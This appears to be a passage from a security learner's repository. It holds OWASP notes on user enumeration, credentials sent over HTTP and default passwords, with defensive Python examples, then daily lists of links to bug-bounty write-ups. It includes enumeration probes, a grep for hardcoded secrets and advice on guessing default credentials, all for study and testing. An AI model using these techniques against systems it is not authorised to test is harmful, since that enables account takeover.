_Using a web proxy, notice the information retrieved from this successful authentication (HTTP 200 Response, length of the response)._
Testing for Valid User with Wrong Password
Now, the tester should try to insert a valid user ID and a wrong password and record the error message generated by the application.
The browser should display a message similar to the following one: Authentication Failed
Testing for a Nonexistent Username
Now, the tester should try to insert an invalid user ID and a wrong password and record the server answer (the tester should be confident that the username is not valid in the application). Record the error message and the server answer.
If the tester enters a nonexistent user ID, they can receive a message similar to: This User is Not Active or a message like the following one
Generally the application should respond with the same error message and length to the different incorrect requests. If the responses are not the same, the tester should investigate and find out the key that creates a difference between the two responses. For example:
1. Client request: Valid user/wrong password
2. Server response: The password is not correct
3. Client request: Wrong user/wrong password
4. Server response: User not recognized
The above responses let the client understand that for the first request they have a valid username. So they can interact with the application requesting a set of possible user IDs and observing the answer.
Looking at the second server response, the tester understands in the same way that they don’t hold a valid username. So they can interact in the same manner and create a list of valid user IDs by looking at the server answers.
Other Ways to Enumerate Users - Testers can enumerate users in several ways, such as:
Analyzing the Error Code Received on Login Pages
Some web applications release a specific error code or message that we can analyze.
Analyzing URLs and URLs Re-directions
For example:
http://www.foo.com/err.jsp?User=baduser&Error=0
http://www.foo.com/err.jsp?User=gooduser&Error=2
As seen above, when a tester provides a user ID and password to the web application, they see a message in the URL indicating that an error has occurred. In the first case they have provided a bad user ID and bad password. In the second, a good user ID and a bad password, so they can identify a valid user ID.
URI Probing
Sometimes a web server responds differently if it receives a request for an existing directory or not. For instance in some portals every user is associated with a directory. If testers try to access an existing directory they could receive a web server error.
Some of the common errors received from web servers are:
403 Forbidden error code
404 Not found error code
Example:
http://www.foo.com/account1 - we receive from web server: 403 Forbidden
http://www.foo.com/account2 - we receive from web server: 404 file Not Found
In the first case the user exists, but the tester cannot view the web page; in the second case the user “account2” does not exist. By collecting this information testers can enumerate the users.
Analyzing Web Page Titles
Testers can obtain useful information from the title of a web page, which may contain a specific error code or message that reveals whether the problem is with the username or the password.
For instance, if a user cannot authenticate to an application and receives a web page whose title is similar to:
1. Invalid user
2. Invalid authentication
Analyzing a Message Received from a Recovery Facility
When we use a recovery facility (i.e. a forgotten password function) a vulnerable application might return a message that reveals if a username exists or not.
For example, messages similar to the following:
1. Invalid username: email address is not valid or the specified user was not found.
2. Valid username: Your password has been successfully sent to the email address you registered with.
Friendly 404 Error Message
When we request a user within the directory that does not exist, we don’t always receive 404 error code. Instead, we may receive “200 ok” with an image, in this case we can assume that when we receive the specific image the user does not exist. This logic can be applied to other web server response; the trick is a good analysis of web server and web application messages.
Analyzing Response Times
As well as looking at the content of the responses, the time that the response takes should also be considered. Particularly where the request causes an interaction with an external service (such as sending a forgotten password email), this can add several hundred milliseconds to the response, which can be used to determine whether the requested user is valid.
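The two signals described above, differing error messages and differing response times, are shown side by side in the following added example, which is not part of the OWASP guide. A login handler that leaks both is paired with one that returns an identical response and does the same password-hashing work for unknown users. The user store, handler names and iteration count are constructed for the example; the three messages are the ones quoted in this section.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # kept low so the example runs quickly
_kdf_count = 0        # counts hash computations, a stand-in for response time


def _kdf(password, salt):
    global _kdf_count
    _kdf_count += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def _record(password):
    salt = os.urandom(16)
    return salt, _kdf(password, salt)


USERS = {"gooduser": _record("correct horse battery")}  # constructed account
_DUMMY = _record(os.urandom(16).hex())  # verified against when the user is unknown


def login_vulnerable(username, password):
    """Distinct messages and no hashing for unknown users: both leak existence."""
    record = USERS.get(username)
    if record is None:
        return 401, "User not recognized"
    salt, digest = record
    if not hmac.compare_digest(_kdf(password, salt), digest):
        return 401, "The password is not correct"
    return 200, "Welcome"


def login_hardened(username, password):
    """Same message, same length and same hashing cost for every failure."""
    salt, digest = USERS.get(username, _DUMMY)
    matches = hmac.compare_digest(_kdf(password, salt), digest)
    if matches and username in USERS:
        return 200, "Welcome"
    return 401, "Authentication Failed"


def leaks_account_existence(login):
    """True if a wrong password yields different responses for known and unknown users."""
    return login("gooduser", "wrong") != login("baduser", "wrong")


def kdf_calls(login, username):
    """Number of password-hash computations one failed attempt costs."""
    before = _kdf_count
    login(username, "wrong")
    return _kdf_count - before


if __name__ == "__main__":
    for login in (login_vulnerable, login_hardened):
        print(login.__name__,
              "leaks:", leaks_account_existence(login),
              "hash calls known/unknown:",
              kdf_calls(login, "gooduser"), kdf_calls(login, "baduser"))
```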
Guessing Users
```
CN000100
CN000101
...
```
Sometimes the usernames are created with a REALM alias and then sequential numbers:
R1001 – user 001 for REALM1
R2001 – user 001 for REALM2
By enumerating user accounts, you risk locking out accounts after a predefined number of failed probes (based on application policy). Also, sometimes, your IP address can be banned by dynamic rules on the application firewall or Intrusion Prevention System.
Tools
BurpSuite/ZAP
================================================
FILE: Resources/Day 38 Task.md
================================================
🎯 Day 38 Task
✅ THM Room
https://tryhackme.com/room/sudovulnsbypass
✅ 4.3.5 Testing for Weak or Unenforced Username Policy
Test Objectives
Determine whether a consistent account name structure renders the application vulnerable to account enumeration.
Determine whether the application’s error messages permit account enumeration.
How to Test
1. Determine the structure of account names.
2. Evaluate the application’s response to valid and invalid account names.
3. Use different responses to valid and invalid account names to enumerate valid account names.
4. Use account name dictionaries to enumerate valid account names.
================================================
FILE: Resources/Day 39 Task.md
================================================
🎯 Day 39 Task
✅ 4.4.1 Testing for Credentials Transported over an Encrypted Channel
Test Objectives
1. Identify sensitive information transmitted through the various channels.
2. Assess the privacy and security of the channels used.
Example 1: Basic Authentication over HTTP
A typical example is the usage of Basic Authentication over HTTP. When using Basic Authentication, user credentials are encoded rather than encrypted, and are sent as HTTP headers. In the example below the tester uses curl to test for this issue. Note how the application uses Basic authentication, and HTTP rather than HTTPS.
```
curl -kis http://example.com/restricted/
HTTP/1.1 401 Authorization Required
Date: Fri, 01 Aug 2013 00:00:00 GMT
WWW-Authenticate: Basic realm="Restricted Area"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 162
Content-Type: text/html
<html><head><title>401 Authorization Required</title></head>
<body bgcolor=white> <h1>401 Authorization Required</h1> Invalid login credentials! </body></html>
```
Example 2: Form-Based Authentication Performed over HTTP
Another typical example is authentication forms which transmit user authentication credentials over HTTP. In the example below one can see HTTP being used in the action attribute of the form. It is also possible to see this issue by examining the HTTP traffic with an interception proxy.
```
<form action="http://example.com/login">
<label for="username">User:</label> <input type="text" id="username" name="username" value=""/><br />
<label for="password">Password:</label> <input type="password" id="password" name="password" value=""/>
<input type="submit" value="Login"/>
</form>
```
Example 3: Cookie Containing Session ID Sent over HTTP
The Session ID Cookie must be transmitted over protected channels. If the cookie does not have the secure flag set, it is permitted for the application to transmit it unencrypted. Note below the setting of the cookie is done without the Secure flag, and the entire log in process is performed in HTTP and not HTTPS.
```
https://secure.example.com/login
POST /login HTTP/1.1
Host: secure.example.com
[...]
Referer: https://secure.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
HTTP/1.1 302 Found
Date: Tue, 03 Dec 2013 21:18:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; expires=Fri, 01-Jan-2014 00:00:00 GMT; path=/; domain=example.com; httponly
Location: private/
Content-Length: 0
Content-Type: text/html
```
```
http://example.com/private
GET /private HTTP/1.1
Host: example.com
[...]
Referer: https://secure.example.com/login
Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA;
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Date: Tue, 25 Dec 2013 00:00:00 GMT
```
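The checks from Examples 1 to 3, written as an added Python example (not part of the OWASP guide or these notes). The function names and finding labels are assumptions made for illustration, and the sample responses are constructed from the ones shown above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed samples, modelled on the three responses shown above.
BASIC_401 = """HTTP/1.1 401 Authorization Required
WWW-Authenticate: Basic realm="Restricted Area"
Content-Type: text/html

<html><body><h1>401 Authorization Required</h1></body></html>
"""
LOGIN_PAGE = """HTTP/1.1 200 OK
Content-Type: text/html

<form action="http://example.com/login">
<input type="text" id="username" name="username" value=""/><br />
<input type="password" id="password" name="password" value=""/>
<input type="submit" value="Login"/>
</form>
"""
LOGIN_302 = """HTTP/1.1 302 Found
Set-Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; expires=Fri, 01-Jan-2014 00:00:00 GMT; path=/; domain=example.com; httponly
Location: private/
"""


class LoginFormParser(HTMLParser):
    """Collects the action of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.action = ""
        self.has_password = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.in_form, self.has_password = True, False
            self.action = attrs.get("action") or ""
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.has_password:
                self.password_form_actions.append(self.action)
            self.in_form = False


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(name, value)], body)."""
    head, _, body = raw.replace("\r\n", "\n").strip().partition("\n\n")
    lines = head.splitlines()
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def cookie_flags(set_cookie_value):
    """Return (cookie name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    return name, {p.split("=", 1)[0].lower() for p in parts[1:] if p}


def audit_exchange(url, raw_response):
    """List transport findings for one response fetched from `url`."""
    findings = []
    is_https = urlsplit(url).scheme.lower() == "https"
    _, headers, body = parse_response(raw_response)
    for name, value in headers:
        # Example 1: a Basic challenge on a cleartext URL exposes credentials.
        if name == "www-authenticate" and value.lower().startswith("basic") and not is_https:
            findings.append("basic-auth-over-http")
        # Example 3: without Secure the browser may send the cookie over HTTP.
        if name == "set-cookie":
            cookie_name, flags = cookie_flags(value)
            if "secure" not in flags:
                findings.append(f"cookie-without-secure:{cookie_name}")
    # Example 2: a password form whose resolved action is not HTTPS.
    parser = LoginFormParser()
    parser.feed(body)
    for action in parser.password_form_actions:
        target = urljoin(url, action)
        if urlsplit(target).scheme.lower() != "https":
            findings.append(f"password-form-posts-to-http:{target}")
    return findings


if __name__ == "__main__":
    print(audit_exchange("http://example.com/restricted/", BASIC_401))
    print(audit_exchange("https://example.com/", LOGIN_PAGE))
    print(audit_exchange("https://secure.example.com/login", LOGIN_302))
```

The cookie check runs regardless of the URL scheme because a cookie set over HTTPS without `Secure` is still sent on later HTTP requests to the same domain, as the second capture above shows.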
Example 4: Password Reset, Change Password or Other Account Manipulation over HTTP
If the web application has features that allow a user to change an account or call a different service with credentials, verify all of those interactions use HTTPS. The interactions to test include the following:
1. Forms that allow users to handle a forgotten password or other credentials
2. Forms that allow users to edit credentials
3. Forms that require the user to authenticate with another provider (for example, payment processing)
Example 5: Testing Password Sensitive Information in Source Code or Logs
Use one of the following techniques to search for sensitive information.
Checking if a password or encryption key is hardcoded in the source code or configuration files.
```
grep -r -E "Pass|password|pwd|user|guest|admin|encry|key|decrypt|sharekey" ./PathToSearch/
```
Checking if logs or source code may contain phone number, email address, ID or any other PII. Change the regular expression based on the format of the PII.
```
grep -r " \{2\}[0-9]\{6\} " ./PathToSearch/
```
Remediation - Use HTTPS for the whole web site and redirect any HTTP requests to HTTPS.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 40 Task.md
================================================
🎯 Day 40 Task
✅ 4.4.2 Testing for Default Credentials
Test Objectives
1. Determine whether the application has any user accounts with default passwords.
2. Review whether new user accounts are created with weak or predictable passwords.
How to Test - Testing for Vendor Default Credentials
The first step to identifying default passwords is to identify the software that is in use.
Once the software has been identified, try to find whether it uses default passwords, and if so, what they are. This should include:
1. Searching for “[SOFTWARE] default password”.
2. Reviewing the manual or vendor documentation.
3. Checking common default password databases, such as CIRT.net, SecLists Default Passwords or DefaultCreds-cheat-sheet.
4. Inspecting the application source code (if available).
5. Installing the application on a virtual machine and inspecting it.
6. Inspecting the physical hardware for stickers (often present on network devices).
If a default password can’t be found, try common options such as:
1. “admin”, “password”, “12345”, or other common default passwords.
2. An empty or blank password.
3. The serial number or MAC address of the device.
If the username is unknown, there are various options for enumerating users, discussed in the Testing for Account Enumeration guide. Alternatively, try common options such as “admin”, “root”, or “system”.
Testing for Organisation Default Passwords
When staff within an organisation manually create passwords for new accounts, they may do so in a predictable way. This can often be:
1. A single common password such as “Password1”.
2. Organisation specific details, such as the organisation name or address.
3. Passwords that follow a simple pattern, such as “Monday123” if the account is created on a Monday.
Testing for Application Generated Default Passwords
If the application automatically generates passwords for new user accounts, these may also be predictable. In order to test these, create multiple accounts on the application with similar details at the same time, and compare the passwords that are given for them.
The passwords may be based on:
1. A single static string shared between accounts.
2. A hashed or obfuscated part of the account details, such as md5($username).
3. A time-based algorithm.
4. A weak pseudo-random number generator (PRNG).
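One way to run the comparison described above on passwords issued to test accounts you created yourself, as an added Python example (not from the OWASP guide or these notes). The function names, finding labels and sample accounts are assumptions, and the weak-PRNG case is not covered because it needs statistical testing over many samples.

```python
import hashlib
from datetime import datetime, timezone


def username_digests(username):
    """Hex digests of the username under common unsalted hashes."""
    data = username.encode("utf-8")
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def time_tokens(created):
    """Strings a time-based generator could embed for this creation time."""
    return {
        "date-yyyymmdd": created.strftime("%Y%m%d"),
        "date-ddmmyyyy": created.strftime("%d%m%Y"),
        "clock-hhmmss": created.strftime("%H%M%S"),
        "epoch-seconds": str(int(created.timestamp())),
        "weekday": created.strftime("%A"),
    }


def analyse_issued_passwords(samples):
    """samples: list of (username, created_at, issued_password).

    Returns a sorted list of labels describing how the issued passwords
    are predictable; an empty list means none of these checks fired.
    """
    findings = set()
    passwords = [password for _, _, password in samples]
    # 1. A single static string shared between accounts.
    if len(set(passwords)) < len(passwords):
        findings.add("shared-static-password")
    for username, created, password in samples:
        low = password.lower()
        # 2. A hashed part of the account details, such as md5($username).
        for alg, digest in username_digests(username).items():
            if len(low) >= 6 and (low in digest or digest in low):
                findings.add(f"derived-from-{alg}-of-username")
        # 3. A time-based algorithm (also catches patterns like "Monday123").
        for label, token in time_tokens(created).items():
            if token.lower() in low:
                findings.add(f"time-based:{label}")
    return sorted(findings)


# Constructed sample data: accounts registered at the same moment (a Monday).
CREATED = datetime(2024, 1, 8, 9, 30, 15, tzinfo=timezone.utc)
STATIC_SAMPLES = [("u1", CREATED, "Welcome1"), ("u2", CREATED, "Welcome1")]
HASHED_SAMPLES = [
    (name, CREATED, hashlib.md5(name.encode()).hexdigest()[:8])
    for name in ("alice", "bob")
]
PATTERN_SAMPLES = [("carol", CREATED, "Monday123")]
RANDOM_SAMPLES = [("dave", CREATED, "q7#Lp2!xVz9@"), ("erin", CREATED, "Zk4$wN8&rT1e")]

if __name__ == "__main__":
    for label, samples in [
        ("static", STATIC_SAMPLES),
        ("hashed", HASHED_SAMPLES),
        ("pattern", PATTERN_SAMPLES),
        ("random", RANDOM_SAMPLES),
    ]:
        print(label, analyse_issued_passwords(samples))
```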
Tools - BurpSuite Intruder, Hydra
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 41 Task.md
================================================
🎯 Day 41 Task
CSRF
https://medium.com/@chiragrai3666/csrf-today-techniques-mitigations-and-bypasses-continued-4587992b6087
#infosec #learn365
================================================
FILE: Resources/Day 42 Task.md
================================================
🎯 Day 42 Task
✅ Open Redirect
https://youtu.be/dz052doAJSE
#infosec #learn365
================================================
FILE: Resources/Day 43 Task.md
================================================
🎯 Day 43 Task
✅ Log4j
https://youtu.be/lKPUCkPTcJA
https://youtu.be/Z70B3fYQUNs
#infosec #learn365
================================================
FILE: Resources/Day 44 Task.md
================================================
🎯 Day 44 Task
JWT Attacking JSON Web Tokens
✅ https://infosecwriteups.com/attacking-json-web-tokens-jwts-d1d51a1e17cb
#infosec #learn365
================================================
FILE: Resources/Day 45 Task.md
================================================
🎯 Day 45 Task
✅ Content Discovery
https://youtu.be/fGlzDi3hwlU
#infosec #learn365
================================================
FILE: Resources/Day 46 Task.md
================================================
🎯 Day 46 Task
✅ IDOR
https://medium.com/@aysebilgegunduz/everything-you-need-to-know-about-idor-insecure-direct-object-references-375f83e03a87
#infosec #learn365
================================================
FILE: Resources/Day 47 Task.md
================================================
🎯 Day 47 Task
✅ Account Takeover
https://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b
#infosec #learn365
================================================
FILE: Resources/Day 48 Task.md
================================================
🎯 Day 48 Task
✅ RCE on a Java Web Application
https://infosecwriteups.com/the-story-of-a-rce-on-a-java-web-application-2e400cddcd1e
#infosec #learn365
================================================
FILE: Resources/Day 49 Task.md
================================================
🎯 Day 49 Task
✅ Dependency Confusion
https://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66907
#infosec #learn365
================================================
FILE: Resources/Day 50 Task.md
================================================
🎯 Day 50 Task
✅ Automate Blind XSS
https://securityonline.info/blind-xss-search/
https://youtu.be/GcznQUsNW3s
#infosec #learn365
================================================
FILE: Resources/Day 51 Task.md
================================================
🎯 Day 51 Task
✅ Finding And Exploiting S3 Amazon Buckets For Bug Bounties
https://infosecwriteups.com/finding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
#infosec #learn365
================================================
FILE: Resources/Day 52 Task.md
================================================
🎯 Day 52 Task
✅ Web Cache Poisoning attack
https://gupta-bless.medium.com/exploiting-web-cache-poisoning-e3a6b9df157e
#infosec #learn365
================================================
FILE: Resources/Day 53 Task.md
================================================
🎯 Day 53 Task
✅ Unique Case for Price Manipulation
https://infosecwriteups.com/unique-case-for-price-manipulation-bugbounty-vapt-df57637769cd
#infosec #learn365
================================================
FILE: Resources/Day 54 Task.md
================================================
🎯 Day 54 Task
✅ Account takeover via the Password Reset Functionality.
https://infosecwriteups.com/how-i-was-able-to-take-over-any-account-via-the-password-reset-functionality-ef1659f8b481
#infosec #learn365
================================================
FILE: Resources/Day 55 Task.md
================================================
🎯 Day 55 Task
✅ THM Room
https://tryhackme.com/room/ohsint
✅ API Token Hijacking Through Clickjacking
https://infosecwriteups.com/api-token-hijacking-through-clickjacking-2e36c02e6c48
#infosec #learn365
================================================
FILE: Resources/Day 56 Task.md
================================================
🎯 Day 56 Task
✅ API Exploitation →Business Logic Bug
https://medium.com/techiepedia/api-exploitation-business-logic-bug-c176d9df47ee
#infosec #learn365
================================================
FILE: Resources/Day 57 Task.md
================================================
🎯 Day 57 Task
✅ Attended [Infosec Conference](https://twitter.com/InfoSecComm) on : Android Static Analysis
https://docs.google.com/presentation/d/1GxcKVrkrnNno1Ro5knmksp1-oVzein6y2xMJxJ9Kz3g/edit?usp=drivesdk
#infosec #learn365
================================================
FILE: Resources/Day 58 Task.md
================================================
🎯 Day 58 Task
✅ Finding bugs on NFT website for fun & Profit by @zseano
#infosec #learn365
================================================
FILE: Resources/Day 59 Task.md
================================================
🎯 Day 59 Task
✅ EXIF Geolocation Data Not Stripped From Uploaded Images
https://medium.com/@souravnewatia/exif-geolocation-data-not-stripped-from-uploaded-images-794d20d2fa7d#:~:text=Summary%3A,Software%20%26%20Software%20version%20used%20etc.
#infosec #learn365
================================================
FILE: Resources/Day 60 Task.md
================================================
🎯 Day 60 Task
✅ Thick Client Pentesting
https://payatu.com/blog/farid/Thick-Client-Basic
https://youtu.be/dC9M4haCd5Y
#infosec #learn365
================================================
FILE: Resources/Day 61 Task.md
================================================
🎯 Day 61 Task
✅ Conduct a Penetration Test Like a Pro in 6 Phases
https://youtu.be/8a1yTN2kFNw
#infosec #learn365
================================================
FILE: Resources/Day 62 Task.md
================================================
🎯 Day 62 Task
✅ Firewall Penetration Testing
https://youtu.be/0Izu0J6iSoM
https://youtu.be/ocekT9Llep0
#infosec #learn365
================================================
FILE: Resources/Day 63 Task.md
================================================
🎯 Day 63 Task
✅ Host Discovery & Vulnerability Scanning With Nessus
https://youtu.be/TA1rCRyHRsM
#infosec #learn365
================================================
FILE: Resources/Day 64 Task.md
================================================
🎯 Day 64 Task
✅ AWS Web Application Firewall (WAF)
https://youtu.be/udug43AWeJw
✅ 5 Pentesterlab Exercises
#infosec #learn365
================================================
FILE: Resources/Day 65 Task.md
================================================
🎯 Day 65 Task
✅ Introduction To Pentesting - Enumeration
https://youtu.be/WvSEkPU1n0I
✅ 6 Pentesterlab Exercises
#infosec #learn365
================================================
FILE: Resources/Day 66 Task.md
================================================
🎯 Day 66 Task
✅ Bypassing CSRF Protection
https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee
https://medium.com/@Skylinearafat/a-very-useful-technique-to-bypass-the-csrf-protection-for-fun-and-profit-471af64da276
✅ 5 Pentesterlab Exercises
#infosec #learn365
================================================
FILE: Resources/Day 67 Task.md
================================================
🎯 Day 67 Task
✅ HTML Injection
https://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed
https://vedanttekale20.medium.com/how-html-injection-in-email-got-me-my-first-bounty-761592eab6bb
#infosec #learn365
================================================
FILE: Resources/Day 68 Task.md
================================================
🎯 Day 68 Task
✅ Exploiting SQL Injection
https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716
✅ Completed Unix Badge
#infosec #learn365
================================================
FILE: Resources/Day 69 Task.md
================================================
🎯 Day 69 Task
✅ A Weird Price Tampering Vulnerability
https://medium.com/@vflexo/a-weird-price-tampering-vulnerability-1251dfe8d2a1
✅ Security Operations Center (SOC)
https://youtu.be/34U_q3UCnYY
#infosec #learn365
================================================
FILE: Resources/Day 70 Task.md
================================================
🎯 Day 70 Task
✅ A Summary of OAuth 2.0 Attack Methods
https://medium.com/@TutorialBoy24/a-summary-of-oauth-2-0-attack-methods-36834805c631
https://youtu.be/0T8WG2liEC0
#infosec #learn365
================================================
FILE: Resources/Day 71 Task.md
================================================
🎯 Day 71 Task
✅ Bypassing CSRF Protection
https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee
✅ 6 Methods to bypass CSRF protection on a web application
https://shahmeeramir.com/methods-to-bypass-csrf-protection-on-a-web-application-3198093f6599
#infosec #learn365
================================================
FILE: Resources/Day 72 Task.md
================================================
🎯 Day 72 Task
✅ Two-factor authentication security testing and possible bypasses
https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35
#infosec #learn365
================================================
FILE: Resources/Day 73 Task.md
================================================
🎯 Day 73 Task
✅ 10 Types of Web Vulnerabilities that are Often Missed
https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/
✅ Understanding BOLA(Broken Object-level Authorisation) vulnerability
https://youtu.be/vnDLFxx6bKs
#infosec #learn365
================================================
FILE: Resources/Day 74 Task.md
================================================
🎯 Day 74 Task
✅ My First Bug Bounty: SQL Injection
https://infosecwriteups.com/first-bug-bounty-ever-sql-injection-da4e64e30851
✅ SQL INJECTION VULNERABILITY
https://youtu.be/NQ_WIyu9fUQ
#infosec #learn365
================================================
FILE: Resources/Day 75 Task.md
================================================
🎯 Day 75 Task
✅ Dank Writeup On Broken Access Control
https://infosecwriteups.com/dank-writeup-on-broken-access-control-on-an-indian-startup-d29132a1ecd
✅ Bug bounty tips for broken access control on BurpSuite Part 1
https://youtu.be/TJQpOrtet8E
#infosec #learn365
================================================
FILE: Resources/Day 76 Task.md
================================================
🎯 Day 76 Task
✅ SSRF in PDF Renderer using SVG
https://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg
✅ Bypassing 2FA using OpenID Misconfiguration
https://youst.in/posts/bypassing-2fa-using-openid-misconfiguration
#infosec #learn365
================================================
FILE: Resources/Day 77 Task.md
================================================
🎯 Day 77 Task
✅ Easy IDOR hunting with Autorize?
https://youtu.be/2WzqH6N-Gbc
✅ HOW I hacked thousand of subdomains
https://medium.com/@moSec/how-i-hacked-thousand-of-subdomains-6aa43b92282c
#infosec #learn365
================================================
FILE: Resources/Day 78 Task.md
================================================
🎯 Day 78 Task
✅ A business logic error bug worth 600$
https://itsdeepceh.medium.com/a-business-logic-error-bug-worth-600-a0050720bfee
✅ 5 Methods to bypass Authentication (OTP)
https://youtu.be/LYDTnkCurU0
#infosec #learn365
================================================
FILE: Resources/Day 79 Task.md
================================================
🎯 Day 79 Task
✅ How to find IDOR | Privilege escalation | weak authorization | Broken access control | Burp Autorize
https://youtu.be/xEttsFQ_0pQ
✅ How did I earn €€€€ by breaking the back-end logic of the server
https://dewcode.medium.com/how-did-i-earn-by-breaking-the-back-end-logic-of-the-server-fd94882cbdf6
#infosec #learn365
================================================
FILE: Resources/Day 80 Task.md
================================================
🎯 Day 80 Task
✅ Account Takeover via Web Cache Poisoning based Reflected XSS
https://lutfumertceylan.com.tr/posts/acc-takeover-web-cache-xss/
✅ A Pentester's Guide to Server Side Template Injection (SSTI)
https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti
#infosec #learn365
================================================
FILE: Resources/Day 81 Task.md
================================================
🎯 Day 81 Task
✅ Account Takeover: From zero to System Admin using basic skills
https://youtu.be/t6-SXKIun8s
✅ Apache Example Servlet leads to $$$$
https://infosecwriteups.com/apache-example-servlet-leads-to-61a2720cac20
#infosec #learn365
================================================
FILE: Resources/Day 82 Task.md
================================================
🎯 Day 82 Task
✅ The easiest $2500 I got it from bug bounty program
https://3bodymo.medium.com/the-easiest-2500-i-got-it-from-bug-bounty-program-8f47ea4aff22
✅ A Pentester’s Guide to File Inclusion
https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion
#infosec #learn365
================================================
FILE: Resources/Day 83 Task.md
================================================
🎯 Day 83 Task
✅ How I bypassed disable_functions in php to get a remote shell
https://infosecwriteups.com/how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell-48b827d54979
✅ JWTs - Patterns & Anti-patterns
https://youtu.be/xTk4ff0eAUg
#infosec #learn365
================================================
FILE: Resources/Day 84 Task.md
================================================
🎯 Day 84 Task
✅ Finding Your Next Bug: GraphQL
https://youtu.be/jyjGneKJynk
✅ No Rate Limit - 2K$ Bounty
https://shahjerry33.medium.com/no-rate-limit-2k-bounty-642720ffba99
#infosec #learn365
================================================
FILE: Resources/Day 85 Task.md
================================================
🎯 Day 85 Task
✅ Facebook email disclosure and account takeover
https://medium.com/pentesternepal/facebook-email-disclosure-and-account-takeover-ecdb44ee12e9
✅ How to learn anything in Computer Science or Cybersecurity | Security Simplified
https://youtu.be/C8qH9fBR3d0
#infosec #learn365
================================================
FILE: Resources/Day 86 Task.md
================================================
🎯 Day 86 Task
✅ Hacking banks with race conditions
https://youtu.be/QtV3Qc-bY1s
✅ Exploiting a Race Condition Vulnerability
https://medium.com/@vincenz/exploiting-a-race-condition-vulnerability-3f2cb387a72
#infosec #learn365
================================================
FILE: Resources/Day 87 Task.md
================================================
🎯 Day 87 Task
✅ A Comprehensive Guide to Broken Access Control
https://medium.com/purplebox/broken-access-control-f82235ddf888
✅ Never leave this tip while you hunting Broken Access Control
https://secureitmania.medium.com/never-leave-this-tip-while-you-hunting-broken-access-control-f63c00b1e96a
✅ POC
https://youtu.be/mmxni6f0sgs
https://youtu.be/ysuMf_F328U
#infosec #learn365
================================================
FILE: Resources/Day 88 Task.md
================================================
🎯 Day 88 Task
✅ A Journey from IDOR to Account Takeover
https://payatu.com/blog/arjuns/A-Journey-IDOR-to-Account-Takeover
✅ Exploiting open redirect - Whitelist bypass using Salesforce environment
https://payatu.com/blog/gaurav/exploiting-open-redirect
#infosec #learn365
================================================
FILE: Resources/Day 89 Task.md
================================================
🎯 Day 89 Task
✅ Union Based SQL Injection — Bug Hunting
https://eslam3kl.medium.com/sql-injection-at-spotify-d19e0861ddf0
✅ Bypass confirmation to add payment method
https://0xpopoy.medium.com/bypass-confirmation-to-add-payment-method-df2772a36561
#infosec #learn365
================================================
FILE: Resources/Day 90 Task.md
================================================
🎯 Day 90 Task
✅ Exploiting cross-site scripting in Referer header
https://www.gremwell.com/exploiting_xss_in_referer_header
✅ XSS via X-Forwarded-Host header
https://medium.com/@abhijeetbiswas_/xss-cross-site-scripting-via-x-forwarded-host-header-20be114d4254
#infosec #learn365
================================================
FILE: Resources/Day 91 Task.md
================================================
🎯 Day 91 Task
✅ How I bypassed 403 forbidden domain using a simple trick
https://janmuhammadzaidi.medium.com/how-i-bypassed-403-forbidden-domain-using-a-simple-trick-c2d538de04b8
✅ Deleting account via support ticket
https://pwnsec.ninja/2022/03/26/deleting-account-via-support-ticket/
#infosec #learn365
================================================
FILE: Resources/Day 92 Task.md
================================================
🎯 Day 92 Task
✅ Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite
https://sirleeroyjenkins.medium.com/bypassing-ssrf-protection-to-exfiltrate-aws-metadata-from-larksuite-bf99a3599462
✅ WordPress < 5.8.3 - Object Injection Vulnerability
https://blog.sonarsource.com/wordpress-object-injection-vulnerability
#infosec #learn365
================================================
FILE: Resources/Day 93 Task.md
================================================
🎯 Day 93 Task
✅ 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x
https://hackerone.com/reports/1458236
#infosec #learn365
================================================
FILE: Resources/Day 94 Task.md
================================================
🎯 Day 94 Task
✅ GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE
https://abdilahrf.github.io/bugbounty/got-access-to-dota-2-admin-panel-by-exploiting-in-game-feature
#infosec #learn365
================================================
FILE: Resources/Day 95 Task.md
================================================
🎯 Day 95 Task
✅ How I escalated RFI into LFI
